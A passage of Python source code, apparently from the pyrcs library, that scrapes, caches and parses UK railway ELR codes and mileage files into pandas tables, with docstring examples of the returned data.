'Miles_Chains': miles_chains,\n }\n parsed_mileage = pd.DataFrame(parsed_mileage_)\n\n return parsed_mileage\n\n @staticmethod\n def _preprocess_node_x(node_x):\n # node_x = node_x.replace(\n # ' with Freightliner terminal', ' & Freightliner Terminal').replace(\n # ' with curve to', ' with').replace(\n # ' (0.37 long)', '')\n # pat = re.compile(\n # r'\\w+.*( \\(\\d+\\.\\d+\\))?(/| and \\w+)? 
with '\n # r'([A-Z]){3}(\\d)?( \\(\\d+\\.\\d+\\))?')\n pat = re.compile(\n r'\\w+.*( \\(\\d+\\.\\d+\\))?(/| and \\w+)? with ([A-Z]).*(\\d)?( \\(\\d+\\.\\d+\\))?')\n\n if re.match(pat, node_x):\n node_name = [x.group() for x in re.finditer(r'\\w+.*(?= with)', node_x)]\n conn_node = [x.group() for x in re.finditer(r'(?<= with )[^*]+', node_x)]\n\n else:\n node_name, conn_node = [node_x], [None]\n\n return node_name + conn_node\n\n @staticmethod\n def _parse_prep_nodes(prep_nodes):\n conn_node_lst = []\n for n in prep_nodes.Connection:\n if n is not None:\n if re.match(r'[A-Z]{3}(\\d)?( \\(\\d+.\\d+\\))? ?/ ?[A-Z]{3}(\\d)?'\n r'( \\(\\d+.\\d+\\))?', n):\n m = [x.strip() for x in n.split('/')]\n else:\n m = n.split(' and ')\n if len(m) > 2:\n m = [' and '.join(m[:2]), ' and '.join(m[2:])]\n else:\n m = [n]\n conn_node_lst.append(m)\n #\n assert isinstance(conn_node_lst, list)\n\n for i in [conn_node_lst.index(c) for c in conn_node_lst if len(c) > 1]:\n temp_lst = [\n x.replace('later ', '').rstrip(',').split(' and ')\n for x in conn_node_lst[i] if isinstance(x, str)]\n\n conn_node_lst[i] = [v for lst in temp_lst for v in lst]\n temp_lst = [x.split(', ') for x in conn_node_lst[i]]\n conn_node_lst[i] = [v for lst in temp_lst for v in lst]\n\n most_conn = max(len(c) for c in conn_node_lst)\n # conn_node_list = [c + [None] * (most_conn - len(c)) for c in conn_node_list]\n\n prep_nodes_ = pd.DataFrame(\n conn_node_lst, columns=['Link_{}'.format(n + 1) for n in range(most_conn)])\n\n return prep_nodes_\n\n @staticmethod\n def _uncouple_elr_mileage(node_x):\n # e.g. x = 'ECM5 (44.64)' or x = 'DNT'\n if node_x is None:\n y = ['', '']\n else:\n # pat0 = re.compile(r'\\w+.*(( lines)|( terminal))$')\n pat1 = re.compile(r'([A-Z]{3}(\\d)?$)|((\\w\\s?)*\\w$)')\n pat2 = re.compile(r'([A-Z]{3}(\\d)?$)|(([\\w\\s&]?)*(\\s\\(\\d+\\.\\d+\\))?$)')\n # pat3 = re.compile(r'[A-Z]{3}(\\d)?(\\s\\(\\d+.\\d+\\))?\\s\\[.*?\\]$')\n pat3 = re.compile(r'[A-Z]{3}(\\d)?(\\s\\(\\d+.\\d+\\))?\\s\\[.*?]$')\n pat4 = re.compile(r'[A-Z]{3}(\\d)?\\s\\(\\d+\\.\\d+km\\)')\n # if re.match(pat0, node_x):\n # y = ['', '']\n if re.match(pat1, node_x):\n y = [node_x, '']\n elif re.match(pat2, node_x):\n y = [z[:-1] if re.match(r'\\d+.\\d+\\)', z) else z.strip() for z in node_x.split('(')]\n y[0] = '' if len(y[0]) > 4 else y[0]\n elif re.match(pat3, node_x):\n try:\n y = [\n re.search(r'[A-Z]{3}(\\d)?', node_x).group(0),\n re.search(r'\\d+\\.\\d+', node_x).group(0)]\n except AttributeError:\n y = [re.search(r'[A-Z]{3}(\\d)?', node_x).group(0), '']\n elif re.match(pat4, node_x):\n y = [\n re.search(r'[A-Z]{3}(\\d)?', node_x).group(0),\n mileage_to_mile_chain(yard_to_mileage(\n kilometer_to_yard(km=re.search(r'\\d+\\.\\d+', node_x).group(0))))]\n else:\n y = [node_x, ''] if len(node_x) <= 4 else ['', '']\n y[0] = y[0] if len(y[0]) <= 4 else ''\n\n return y\n\n def _parse_node(self, node):\n \"\"\"\n Parse column of node data.\n\n :param node: column of node data\n :type node: pandas.Series\n :return: parsed nodes\n :rtype: pandas.DataFrame\n \"\"\"\n\n prep_node = pd.DataFrame(\n (self._preprocess_node_x(n) for n in node), columns=['Node', 'Connection'])\n\n conn_nodes = self._parse_prep_nodes(prep_node)\n\n link_cols = [x for x in conn_nodes.columns if re.match(r'^(Link_\\d)', x)]\n link_nodes = conn_nodes[link_cols].applymap(self._uncouple_elr_mileage)\n\n dat = [\n pd.DataFrame(link_nodes[col].values.tolist(), columns=[col + '_ELR', col + '_Mile_Chain'])\n for col in link_cols]\n link_elr_mileage = pd.concat(dat, axis=1, sort=False)\n\n 
parsed_node_and_conn = pd.concat([prep_node, conn_nodes, link_elr_mileage], axis=1)\n\n return parsed_node_and_conn\n\n def _parse_mileage_data(self, mileage_data):\n \"\"\"\n Parse scraped data of mileage file.\n\n :param mileage_data: preprocessed data of mileage file scraped from source web page\n :type mileage_data: pandas.DataFrame\n :return: parsed data of mileage file\n :rtype: pandas.DataFrame\n \"\"\"\n\n mileage, node = mileage_data.iloc[:, 0], mileage_data.iloc[:, 1]\n\n parsed_mileage = self._parse_mileage(mileage=mileage)\n parsed_node_and_conn = self._parse_node(node=node)\n\n parsed_dat = pd.concat([parsed_mileage, parsed_node_and_conn], axis=1)\n\n return parsed_dat\n\n def collect_elr_by_initial(self, initial, update=False, verbose=False):\n \"\"\"\n Collect Engineer's Line References (ELRs) for a given initial letter from source web page.\n\n :param initial: initial letter of an ELR, e.g. ``'a'``, ``'z'``\n :type initial: str\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param verbose: whether to print relevant information in console, defaults to ``True``\n :type verbose: bool or int\n :return: data of ELRs whose names start with the given initial letter and\n date of when the data was last updated\n :rtype: dict\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> elrs_a_codes = em.collect_elr_by_initial(initial='a')\n >>> type(elrs_a_codes)\n dict\n >>> list(elrs_a_codes.keys())\n ['A', 'Last updated date']\n\n >>> elrs_a_codes_dat = elrs_a_codes['A']\n >>> type(elrs_a_codes_dat)\n pandas.core.frame.DataFrame\n >>> elrs_a_codes_dat.head()\n ELR ... Notes\n 0 AAL ... Now NAJ3\n 1 AAM ... Formerly AML\n 2 AAV ...\n 3 ABB ... Now AHB\n 4 ABB ...\n [5 rows x 5 columns]\n\n >>> elrs_q_codes = em.collect_elr_by_initial(initial='Q')\n >>> elrs_q_codes_dat = elrs_q_codes['Q']\n >>> elrs_q_codes_dat.head()\n ELR ... Notes\n 0 QAB ... Duplicates ALB?\n 1 QBL ...\n 2 QDS ...\n 3 QLT ...\n 4 QLT1 ...\n [5 rows x 5 columns]\n \"\"\"\n\n beginning_with = validate_initial(x=initial)\n\n path_to_pickle = self._cdd(\"a-z\", beginning_with.lower() + \".pkl\")\n if os.path.isfile(path_to_pickle) and not update:\n elrs = load_data(path_to_pickle)\n\n else:\n if verbose == 2:\n print(f\"Collecting data of {self.KEY} beginning with '{beginning_with}'\", end=\" ... \")\n\n elrs = {beginning_with: None, self.KEY_TO_LAST_UPDATED_DATE: None}\n\n try:\n url = self.catalogue[beginning_with]\n # url = em.catalogue[beginning_with]\n source = requests.get(url=url, headers=fake_requests_headers())\n\n except Exception as e:\n if verbose == 2:\n print(\"Failed.\", end=\" \")\n print_inst_conn_err(verbose=verbose, e=e)\n\n else:\n try:\n columns, records = parse_table(source=source, parser='html.parser')\n data = [[x.replace('=', 'See').strip('\\xa0') for x in i] for i in records]\n\n # Create a DataFrame of the requested table\n elrs_codes = pd.DataFrame(data=data, columns=columns)\n\n last_updated_date = get_last_updated_date(url=url, parsed=True)\n\n # Update the dict with both the DataFrame and its last updated date\n elrs = {\n beginning_with: elrs_codes,\n self.KEY_TO_LAST_UPDATED_DATE: last_updated_date,\n }\n\n if verbose == 2:\n print(\"Done.\")\n\n os.makedirs(os.path.dirname(path_to_pickle), exist_ok=True)\n save_data(elrs, path_to_pickle, verbose=verbose)\n\n except Exception as e: # e.g. the requested URL is not available:\n print(f\"Failed. 
{format_err_msg(e)}\")\n\n return elrs\n\n def fetch_elr(self, update=False, dump_dir=None, verbose=False):\n \"\"\"\n Fetch data of ELRs and their associated mileages.\n\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param dump_dir: pathname of a directory where the data file is dumped, defaults to ``None``\n :type dump_dir: str or None\n :param verbose: whether to print relevant information in console, defaults to ``False``\n :type verbose: bool or int\n :return: data of all available ELRs and date of when the data was last updated\n :rtype: dict\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> elrs_codes = em.fetch_elr()\n >>> type(elrs_codes)\n dict\n >>> list(elrs_codes.keys())\n ['ELRs and mileages', 'Last updated date']\n\n >>> em.KEY\n 'ELRs and mileages'\n\n >>> elrs_codes_dat = elrs_codes[em.KEY]\n >>> type(elrs_codes_dat)\n pandas.core.frame.DataFrame\n >>> elrs_codes_dat.head()\n ELR ... Notes\n 0 AAL ... Now NAJ3\n 1 AAM ... Formerly AML\n 2 AAV ...\n 3 ABB ... Now AHB\n 4 ABB ...\n [5 rows x 5 columns]\n \"\"\"\n\n verbose_1 = False if (dump_dir or not verbose) else (2 if verbose == 2 else True)\n verbose_2 = verbose_1 if is_home_connectable() else False\n\n data = [\n self.collect_elr_by_initial(initial=x, update=update, verbose=verbose_2)\n for x in string.ascii_lowercase]\n\n if all(d[x] is None for d, x in zip(data, string.ascii_uppercase)):\n if update:\n print_inst_conn_err(verbose=verbose)\n print_void_msg(data_name=self.KEY, verbose=verbose)\n data = [\n self.collect_elr_by_initial(initial=x, update=False, verbose=verbose_1)\n for x in string.ascii_lowercase]\n\n # Select DataFrames only\n elrs_data = (item[x] for item, x in zip(data, string.ascii_uppercase))\n elrs_data_table = pd.concat(elrs_data, axis=0, ignore_index=True, sort=False)\n\n # Get the latest updated date\n last_updated_dates = (\n item[self.KEY_TO_LAST_UPDATED_DATE] for item, _ in zip(data, string.ascii_uppercase))\n latest_update_date = max(d for d in last_updated_dates if d is not None)\n\n elrs_data = {self.KEY: elrs_data_table, self.KEY_TO_LAST_UPDATED_DATE: latest_update_date}\n\n if dump_dir is not None:\n save_data_to_file(\n self, data=elrs_data, data_name=self.NAME, ext=\".pkl\", dump_dir=dump_dir,\n verbose=False)\n\n return elrs_data\n\n def _mileage_file_dump_names(self, elr):\n data_name = remove_punctuation(elr).lower()\n\n if data_name == \"prn\":\n data_name += \"_\"\n\n dump_dir = self._cdd(\"mileage-files\", data_name[0])\n\n return data_name, dump_dir\n\n def _dump_mileage_file(self, elr, mileage_file, dump_it, verbose):\n if dump_it:\n data_name, dump_dir = self._mileage_file_dump_names(elr)\n\n save_data_to_file(\n self, data=mileage_file, data_name=data_name, ext=\".pkl\", dump_dir=dump_dir,\n verbose=verbose)\n\n @staticmethod\n def _get_parsed_contents(elr_dat, notes):\n val_cols = ['Line name', 'Mileages', 'Datum']\n line_name, mileages, _ = elr_dat[val_cols].values[0]\n\n if re.match(r'(\\w ?)+ \\((\\w ?)+\\)', line_name):\n line_name_ = re.search(r'(?<=\\w \\()(\\w ?)+.(?=\\))', line_name).group(0)\n\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to) ', line_name_)\n line_name = re.search(r'(\\w ?)+.(?= \\((\\w ?)+\\))', line_name).group(0)\n except ValueError:\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to) ', notes)\n line_name = line_name_\n except ValueError:\n loc_a, loc_b = '', ''\n\n elif 
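# [Illustrative sketch, not part of the original record.]  _mileage_file_dump_names()
# above appends an underscore when the ELR is "prn" because PRN is a reserved device
# name on Windows and cannot be used as a file name; CON, AUX, NUL, COM1-COM9 and
# LPT1-LPT9 are reserved as well.  A more general guard in the same spirit:
WINDOWS_RESERVED = ({"con", "prn", "aux", "nul"}
                    | {f"com{i}" for i in range(1, 10)}
                    | {f"lpt{i}" for i in range(1, 10)})


def safe_dump_name(name):
    # Append "_" to any name that would collide with a reserved device name.
    name = name.lower()
    return name + "_" if name in WINDOWS_RESERVED else name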
elr_dat.Mileages.values[0].startswith('0.00') and elr_dat.Datum.values[0] != '':\n loc_a = elr_dat.Datum.values[0]\n if loc_a in line_name:\n loc_b = re.split(r' (and|&|to) ', line_name)[2]\n else:\n loc_b = line_name\n\n elif re.match(r'(\\w ?)+ to (\\w ?)+', notes):\n loc_a, loc_b = notes.split(' to ')\n\n else:\n loc_a, loc_b = '', ''\n\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to|-) ', notes)\n except (ValueError, TypeError):\n pass\n\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to|-) ', line_name)\n except (ValueError, TypeError):\n pass\n\n if line_name:\n loc_a, loc_b = line_name, line_name\n\n # if re.match(r'.*( Branch| Curve)$', loc_b):\n # loc_b = re.sub(r' Branch| Curve', '', loc_b)\n # else:\n # loc_b = loc_b\n\n miles_chains = mileages.split(' - ')\n locations = [loc_a, loc_b]\n parsed_content = [[m, l] for m, l in zip(miles_chains, locations)]\n\n return line_name, parsed_content\n\n def collect_mileage_file(self, elr, parsed=True, confirmation_required=True, dump_it=False,\n verbose=False):\n \"\"\"\n Collect mileage file for the given ELR from source web page.\n\n :param elr: ELR, e.g. ``'CJD'``, ``'MLA'``, ``'FED'``\n :type elr: str\n :param parsed: whether to parse the scraped mileage data\n :type parsed: bool\n :param confirmation_required: whether to confirm before proceeding, defaults to ``True``\n :type confirmation_required: bool\n :param dump_it: whether to save the collected data as a pickle file, defaults to ``False``\n :type dump_it: bool\n :param verbose: whether to print relevant information in console, defaults to ``False``\n :type verbose: bool or int\n :return: mileage file for the given ``elr``\n :rtype: dict\n\n .. note::\n\n - In some cases, mileages are unknown hence left blank,\n e.g. ANI2, Orton Junction with ROB (~3.05)\n - Mileages in parentheses are not on that ELR, but are included for reference,\n e.g. ANL, (8.67) NORTHOLT [London Underground]\n - As with the main ELR list, mileages preceded by a tilde (~) are approximate.\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> gam_mileage_file = em.collect_mileage_file(elr='GAM')\n To collect mileage file of \"GAM\"\n ? [No]|Yes: yes\n >>> type(gam_mileage_file)\n dict\n >>> list(gam_mileage_file.keys())\n ['ELR', 'Line', 'Sub-Line', 'Mileage', 'Notes']\n >>> gam_mileage_file['Mileage']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 8.1518 8.69 ... None\n 1 10.0264 10.12 ... None\n [2 rows x 8 columns]\n\n >>> xrc2_mileage_file = em.collect_mileage_file(elr='XRC2')\n To collect mileage file of \"XRC2\"\n ? [No]|Yes: yes\n >>> xrc2_mileage_file['Mileage']\n Mileage Mileage_Note ... Link_1_ELR Link_1_Mile_Chain\n 0 9.0158 14.629km ...\n 1 9.0447 14.893km ...\n 2 9.0557 14.994km ...\n [3 rows x 8 columns]\n\n >>> xre_mileage_file = em.collect_mileage_file(elr='XRE')\n To collect mileage file of \"XRE\"\n ? [No]|Yes: yes\n >>> xre_mileage_file['Mileage']\n Mileage Mileage_Note ... Link_2_ELR Link_2_Mile_Chain\n 0 7.0073 11.333km ...\n 1 7.0174 11.425km ...\n 2 9.0158 14.629km ...\n 3 9.0198 14.666km ...\n 4 9.0389 14.840km ...\n 5 9.0439 (14.886)km ...\n 6 9.0540 (14.978)km ...\n [7 rows x 11 columns]\n\n >>> mor_mileage_file = em.collect_mileage_file(elr='MOR')\n To collect mileage file of \"MOR\"\n ? 
[No]|Yes: yes\n >>> type(mor_mileage_file['Mileage'])\n dict\n >>> list(mor_mileage_file['Mileage'].keys())\n ['Original measure', 'Later measure']\n >>> mor_mileage_file['Mileage']['Original measure']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... SWA (215.18) SWA 215.18\n 1 0.0792 0.36 ... None\n 2 0.1716 0.78 ... None\n 3 1.1166 1.53 ... None\n 4 2.0066 2.03 ... None\n 5 2.0836 2.38 ... None\n 6 ... None\n 7 3.0462 3.21 ... SDI2 (2.79) SDI2 2.79\n [8 rows x 8 columns]\n >>> mor_mileage_file['Mileage']['Later measure']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... SWA (215.26) SWA 215.26\n 1 0.0176 0.08 ... SWA (215.18) SWA 215.18\n 2 0.0968 0.44 ... None\n 3 1.0132 1.06 ... None\n 4 1.1342 1.61 ... None\n 5 2.0242 2.11 ... None\n 6 2.1012 2.46 ... None\n 7 ... None\n 8 3.0638 3.29 ... SDI2 (2.79) SDI2 2.79\n [9 rows x 8 columns]\n\n >>> fed_mileage_file = em.collect_mileage_file(elr='FED')\n To collect mileage file of \"FED\"\n ? [No]|Yes: yes\n >>> type(fed_mileage_file['Mileage'])\n dict\n >>> list(fed_mileage_file['Mileage'].keys())\n ['Current route', 'Original route']\n >>> fed_mileage_file['Mileage']['Current route']\n Mileage Mileage_Note ... Link_1_ELR Link_1_Mile_Chain\n 0 83.1254 ... FEL\n 1 84.0198 ...\n 2 84.1430 ...\n 3 84.1540 ...\n 4 85.0484 ...\n 5 85.1122 ...\n 6 85.1188 ... TFN 2.13\n [7 rows x 8 columns]\n >>> fed_mileage_file['Mileage']['Original route']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... FEL (84.22) FEL 84.22\n 1 1.0176 1.08 ... None\n 2 1.1540 1.70 ... None\n 3 1.1694 1.77 ... None\n [4 rows x 8 columns]\n \"\"\"\n\n elr_ = remove_punctuation(elr).upper()\n\n if elr_ != '':\n\n mileage_file = None\n\n if confirmed(f\"To collect mileage file of \\\"{elr_}\\\"\\n?\", confirmation_required):\n\n if verbose == 2:\n print(f\"Collecting mileage file of \\\"{elr_}\\\"\", end=\" ... \")\n\n try:\n url = home_page_url() + f'/elrs/_mileages/{elr_[0]}/{elr_}.shtm'.lower()\n source = requests.get(url=url, headers=fake_requests_headers())\n\n except Exception as e:\n if verbose == 2:\n print(\"Failed.\", end=\" \")\n print_inst_conn_err(verbose=verbose, e=e)\n\n else:\n try:\n soup = bs4.BeautifulSoup(markup=source.content, features='html.parser')\n\n line_name = soup.find(name='h3').text\n\n sub_line_name_ = soup.find(name='h4')\n if sub_line_name_ is not None:\n sub_line_name = sub_line_name_.get_text()\n else:\n sub_line_name = ''\n\n err404 = {'\"404\" error: page not found', '404 error: page not found'}\n if any(x in err404 for x in {line_name, sub_line_name}):\n elr_data = self.collect_elr_by_initial(elr_[0])[elr_[0]]\n elr_data = elr_data[elr_data['ELR'] == elr_]\n\n notes_dat = elr_data['Notes'].iloc[0]\n if re.match(r'(Now( part of)? 
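# [Illustrative sketch, not part of the original record.]  The docstring examples
# above pair a Miles_Chains value such as 0.36 (0 miles 36 chains) with a Mileage
# value such as 0.0792 (0 miles 792 yards): one chain is 22 yards and 80 chains
# make a mile, so 36 * 22 = 792.  A hypothetical converter between the two
# notations (the package's own helper for this direction is mile_chain_to_mileage):
def miles_chains_to_miles_yards(mc):
    miles, chains = str(mc).split(".")
    return f"{int(miles)}.{int(chains) * 22:04d}"  # 1 chain == 22 yards


assert miles_chains_to_miles_yards("0.36") == "0.0792"
assert miles_chains_to_miles_yards("8.69") == "8.1518"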
|= |See )[A-Z]{3}(\\d)?$', notes_dat):\n elr_alt = re.search(r'(?<= )[A-Z]{3}(\\d)?', notes_dat).group(0)\n mileage_file_alt = self.collect_mileage_file(\n elr=elr_alt, parsed=parsed, confirmation_required=False,\n dump_it=False, verbose=verbose)\n\n if notes_dat.startswith('Now'):\n mileage_file_former = copy.copy(mileage_file_alt)\n\n mileage_file_alt.update({'Formerly': elr_})\n self._dump_mileage_file(elr_alt, mileage_file_alt, dump_it, verbose)\n\n mileage_file_former.update(({'Now': elr_alt}))\n self._dump_mileage_file(elr_, mileage_file_former, dump_it, verbose)\n\n return mileage_file_alt\n\n else:\n line_name, content = self._get_parsed_contents(elr_data, notes_dat)\n\n else:\n ln_temp = line_name.split('\\t')\n line_name = ln_temp[0] if len(ln_temp) == 1 else ln_temp[1]\n\n content = [\n x.strip().split('\\t', 1) for x in soup.find('pre').text.splitlines()\n if x != '']\n content = [\n [y.replace(' ', ' ').replace('\\t', ' ') for y in x] for x in content]\n content = [\n [''] + x if (len(x) == 1) & ('Note that' not in x[0]) else x\n for x in content]\n\n # assert sub_headers[0] == elr\n if sub_line_name and (sub_line_name not in err404):\n sub_ln_temp = sub_line_name.split('\\t')\n sub_headers = sub_ln_temp[0] if len(sub_ln_temp) == 1 else sub_ln_temp[1]\n else:\n sub_headers = ''\n\n # Make a dict of line information\n line_info = {'ELR': elr_, 'Line': line_name, 'Sub-Line': sub_headers}\n\n # Search for notes\n notes_dat = []\n parsed_content = content.copy()\n # measure_headers = []\n measure_headers_indices = []\n for i, x in enumerate(content):\n if len(x) == 1:\n x_ = x[0] + '.' if x[0].endswith(tuple(string.ascii_letters)) else x[0]\n notes_dat.append(x_)\n parsed_content.remove(x)\n else:\n mil_dat, txt_dat = x\n if mil_dat == '':\n if 'Distances in km' in txt_dat or \\\n 'measured from accurate mapping systems' in txt_dat or \\\n len(txt_dat) >= 50:\n notes_dat.append(txt_dat)\n parsed_content.remove(x)\n elif txt_dat in self.measure_headers:\n # measure_headers.append(txt_dat)\n measure_headers_indices.append(i)\n elif 'Revised distances are thus:' in txt_dat:\n txt_dat = 'Current measure'\n content[i] = [mil_dat, txt_dat]\n # measure_headers.append(txt_dat)\n measure_headers_indices.append(i)\n elif re.search(r'\\bmeasure\\b', txt_dat):\n # measure_headers.append(txt_dat)\n measure_headers_indices.append(i)\n else:\n pass\n\n if any('Distances in km' in x for x in notes_dat):\n parsed_content = [\n [x[0] + 'km', x[1]] if not x[0].endswith('km') else x\n for x in parsed_content]\n\n # Make a dict of note\n notes_data = {'Notes': ' '.join(notes_dat).strip()}\n\n # Create a table of the mileage data\n mileage_data = pd.DataFrame(parsed_content, columns=['Mileage', 'Node'])\n\n # If there are multiple measures in 'mileage_data', e.g. current/former measures\n mileage_data = self._split_measures(\n mileage_data=mileage_data, measure_headers_indices=measure_headers_indices)\n\n if parsed:\n if isinstance(mileage_data, dict) and len(mileage_data) > 1:\n mileage_data = {\n h: self._parse_mileage_data(mileage_data=dat)\n for h, dat in mileage_data.items()}\n else: # isinstance(dat, pd.DataFrame)\n mileage_data = self._parse_mileage_data(mileage_data=mileage_data)\n\n mileage_file = dict(\n pair for x in [line_info, {'Mileage': mileage_data}, notes_data]\n for pair in x.items())\n\n if verbose == 2:\n print(\"Done.\")\n\n self._dump_mileage_file(\n elr=elr_, mileage_file=mileage_file, dump_it=dump_it, verbose=verbose)\n\n except Exception as e:\n print(f\"Failed. 
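# [Illustrative sketch, not part of the original record.]  The branch above follows
# cross-reference notes such as "Now NAJ3" or "See XRE1" to the replacement ELR and
# records the Formerly/Now pair.  The extraction step in isolation, with a made-up
# sample note:
import re

note = "Now part of NAJ3"  # hypothetical sample value for notes_dat
if re.match(r'(Now( part of)? |= |See )[A-Z]{3}(\d)?$', note):
    elr_alt = re.search(r'(?<= )[A-Z]{3}(\d)?', note).group(0)
    assert elr_alt == "NAJ3"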
{format_err_msg(e)}\")\n\n return mileage_file\n\n def fetch_mileage_file(self, elr, update=False, dump_dir=None, verbose=False):\n \"\"\"\n Fetch the mileage file for a given ELR.\n\n :param elr: elr: ELR, e.g. ``'CJD'``, ``'MLA'``, ``'FED'``\n :type elr: str\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param dump_dir: pathname of a directory where the data file is dumped, defaults to ``None``\n :type dump_dir: str or None\n :param verbose: whether to print relevant information in console, defaults to ``False``\n :type verbose: bool or int\n :return: mileage file (codes), line name and, if any, additional information/notes\n :rtype: dict\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> # Get the mileage file of 'AAL' (Now 'NAJ3')\n >>> aal_mileage_file = em.fetch_mileage_file(elr='AAL')\n >>> type(aal_mileage_file)\n dict\n >>> list(aal_mileage_file.keys())\n ['ELR', 'Line', 'Sub-Line', 'Mileage', 'Notes', 'Formerly']\n\n >>> aal_mileage_file['ELR']\n 'NAJ3'\n >>> aal_mileage_file['Notes']\n 'Note that Ashendon Junction up line junction is on NAJ2'\n >>> aal_mileage_file['Mileage']\n Mileage Mileage_Note ... Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 ... NAJ2 33.69\n 1 0.0594 ... GUA 164.75\n 2 1.0396 ...\n 3 3.0682 ...\n 4 6.0704 ...\n 5 8.0572 ... BSG 0.00\n 6 8.0990 ... WEJ\n 7 9.0594 ...\n 8 13.0264 ...\n 9 17.0858 ...\n 10 17.0968 ...\n 11 18.0572 ... DCL 81.10\n 12 18.0638 ... DCL 81.12\n [13 rows x 8 columns]\n\n >>> # Get the mileage file of 'MLA'\n >>> mla_mileage_file = em.fetch_mileage_file(elr='MLA')\n >>> type(mla_mileage_file)\n dict\n >>> list(mla_mileage_file.keys())\n ['ELR', 'Line', 'Sub-Line', 'Mileage', 'Notes']\n >>> mla_mileage_file_mileages = mla_mileage_file['Mileage']\n >>> type(mla_mileage_file_mileages)\n dict\n >>> list(mla_mileage_file_mileages.keys())\n ['Current measure', 'Original measure']\n >>> mla_mileage_file_mileages['Original measure']\n Mileage Mileage_Note ... Link_3_ELR Link_3_Mile_Chain\n 0 4.1386 ... NEM4 0.00\n 1 5.0616 ...\n 2 5.1122 ...\n [3 rows x 14 columns]\n >>> mla_mileage_file_mileages['Current measure']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... MRL2 (4.44) MRL2 4.44\n 1 0.0572 0.26 ... None\n 2 0.1540 0.70 ... None\n 3 0.1606 0.73 ... None\n [4 rows x 8 columns]\n \"\"\"\n\n try:\n elr_ = remove_punctuation(elr)\n data_name, _ = self._mileage_file_dump_names(elr_)\n ext = \".pkl\"\n path_to_pickle = self._cdd(\"mileage-files\", data_name[0], data_name + ext, mkdir=False)\n\n if os.path.isfile(path_to_pickle) and not update:\n mileage_file = load_data(path_to_pickle)\n\n else:\n verbose_ = collect_in_fetch_verbose(data_dir=dump_dir, verbose=verbose)\n mileage_file = self.collect_mileage_file(\n elr=elr_, parsed=True, confirmation_required=False, dump_it=True, verbose=verbose_)\n\n if dump_dir is not None:\n save_data_to_file(\n cls=self, data=mileage_file, data_name=data_name, ext=ext, dump_dir=dump_dir,\n verbose=verbose)\n\n except Exception as e:\n if verbose:\n print(\"Some errors occurred when fetching the data. 
{}\".format(e))\n mileage_file = None\n\n return mileage_file\n\n @staticmethod\n def search_conn(start_elr, start_em, end_elr, end_em):\n \"\"\"\n Search for connection between two ELR-and-mileage pairs.\n\n :param start_elr: start ELR\n :type start_elr: str\n :param start_em: mileage file of the start ELR\n :type start_em: pandas.DataFrame\n :param end_elr: end ELR\n :type end_elr: str\n :param end_em: mileage file of the end ELR\n :type end_em: pandas.DataFrame\n :return: connection (, )\n :rtype: tuple\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> elr_1 = 'AAM'\n >>> mileage_file_1 = em.collect_mileage_file(elr_1, confirmation_required=False)\n >>> mf_1_mileages = mileage_file_1['Mileage']\n >>> mf_1_mileages.head()\n Mileage Mileage_Note ... Link_2_ELR Link_2_Mile_Chain\n 0 0.0000 ...\n 1 0.0154 ...\n 2 0.0396 ...\n 3 1.1012 ...\n 4 1.1408 ...\n [5 rows x 11 columns]\n\n >>> elr_2 = 'ANZ'\n >>> mileage_file_2 = em.collect_mileage_file(elr_2, confirmation_required=False)\n >>> mf_2_mileages = mileage_file_2['Mileage']\n >>> mf_2_mileages.head()\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 84.0924 84.42 ... BEA BEA\n 1 84.1364 84.62 ... AAM (0.18) AAM 0.18\n [2 rows x 8 columns]\n\n >>> elr_1_dest, elr_2_orig = em.search_conn(elr_1, mf_1_mileages, elr_2, mf_2_mileages)\n >>> elr_1_dest\n '0.0396'\n >>> elr_2_orig\n '84.1364'\n \"\"\"\n\n start_mask = start_em.apply(lambda x: x.str.contains(end_elr, case=False).any(), axis=1)\n start_temp = start_em[start_mask]\n assert isinstance(start_temp, pd.DataFrame)\n\n if not start_temp.empty:\n # Get exact location\n key_idx = start_temp.index[0]\n mile_chain_col = [x for x in start_temp.columns if re.match(r'.*_Mile_Chain', x)][0]\n\n start_dest_mileage = start_em.loc[key_idx, 'Mileage'] # Mileage of the Start ELR\n end_orig_mile_chain = start_temp.loc[key_idx, mile_chain_col] # Mileage of the End ELR\n\n if end_orig_mile_chain and end_orig_mile_chain != 'Unknown':\n end_orig_mileage = mile_chain_to_mileage(end_orig_mile_chain)\n\n else: # end_conn_mile_chain == '':\n end_mask = end_em.apply(lambda x: x.str.contains(start_elr, case=False).any(), axis=1)\n end_temp = end_em[end_mask]\n\n if not end_temp.empty:\n end_orig_mileage = end_temp['Mileage'].iloc[0]\n else:\n end_orig_mileage = start_dest_mileage\n\n else:\n start_dest_mileage, end_orig_mileage = '', ''\n\n return start_dest_mileage, end_orig_mileage\n\n def get_conn_mileages(self, start_elr, end_elr, update=False, **kwargs):\n \"\"\"\n Get a connection point between two ELR-and-mileage pairs.\n\n Namely, find the end and start mileages for the start and end ELRs, respectively.\n\n .. 
